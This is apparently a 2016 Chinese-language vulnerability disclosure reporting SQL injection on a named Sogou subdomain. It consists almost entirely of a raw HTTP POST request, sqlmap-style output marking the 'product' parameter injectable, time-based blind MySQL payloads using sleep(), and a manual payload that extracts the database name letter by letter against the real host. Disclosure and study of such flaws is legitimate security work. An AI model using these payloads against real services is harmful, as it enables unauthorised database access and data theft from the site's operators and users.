搜狗某站存在SQL注入
2016年07月14日
原文
POST /index.php/index/logout?s=/Index/login HTTP/1.1 Content-Length: 186 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://union.app.sogou.com/ Cookie: PHPSESSID=c5jcj8ga3ggjuebsfdgk7p7bh3 Host: union.app.sogou.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* password=Passw0ad_a&product=A&username=kksjewpc
--- Parameter: product (POST) Type: error-based Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: password=Passw0ad_a&product=Uxsv'XOR(if(now()=sysdate(),sleep(5),0) )OR'Uxsv&username=kksjewpc Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: password=Passw0ad_a&product=A AND (SELECT * FROM (SELECT(SLEEP(5))) NMiA)&username=kksjewpc --- web application technology: PHP 5.5.6 back-end DBMS: MySQL 5.0.12 获取数据库:、 http://union.app.sogou.com:80/index.php/index/logout?s=/Index/login password=Passw0ad_a&product=Uxsv'XOR(if(1=1,sleep(mid(database(),1,1)='a'),0))OR'Uxsv&username=kksjewpc database: app